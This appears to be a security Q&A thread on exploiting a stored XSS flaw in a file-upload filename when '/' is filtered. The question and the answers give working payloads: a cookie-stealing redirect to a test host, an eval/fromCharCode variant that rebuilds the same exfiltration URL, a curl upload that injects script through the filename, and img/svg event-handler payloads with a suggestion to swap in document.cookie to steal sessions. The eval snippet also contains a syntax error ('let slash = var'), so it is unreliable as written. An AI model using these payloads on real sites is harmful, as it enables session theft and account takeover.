# Exploiting XSS in filename without using /

Tags: web-application, xss, file-upload

I am trying to exploit a vulnerability in the filename field of a file upload. The web application does not properly validate the filename of the uploaded file and as a result there is a stored cross-site scripting vulnerability.

My problem is that whenever I try to rename the file to include something like the below payload, I can't include `/` in the filename.

```
document.location='http://my_test_server.com/bla.php?cookie='+document.cookie;
```

Any ideas/payloads? Is it even possible to exploit this vulnerability?

Comment: You can rename the file with a `/` on a Unix-based system.

Answer (score 1, accepted):

You should use a packet interception application and edit the sent packet. So you replace the / with let's say an _ in the filename, then intercept the packet and change it back in the header.

Answer (score 2):

You can execute any JavaScript without using `/` by using a combination of [`eval`](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/eval) and [`fromCharCode`](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/fromCharCode):

```
let slash = var String.fromCharCode(47);
eval("document.location='http:" + slash + slash + "my_test_server.com" + slash + "bla.php?cookie='+document.cookie;");
```

Answer (score 0):

You can change the filename when uploading with `curl`:

```
curl -X POST http://example.com -F "file_input_name=@testfile;filename=document.location='http://example.com'"
```

However when I tested this with PHP it automatically stripped everything before the last `/`, presumably assuming that the full path had been sent and converting it to the basename.

Answer (score -1):

Yes,there is payload for that where you don't have to use '/' while making injection.These payload are :

1. `<img src=x onerror=alert(123) >`
2. `<svg onload=alert(123)>`

Now, you can insert `document.cookie` instead of `123` in alert method to get the user session.

Comment: How does the attacker get the cookie?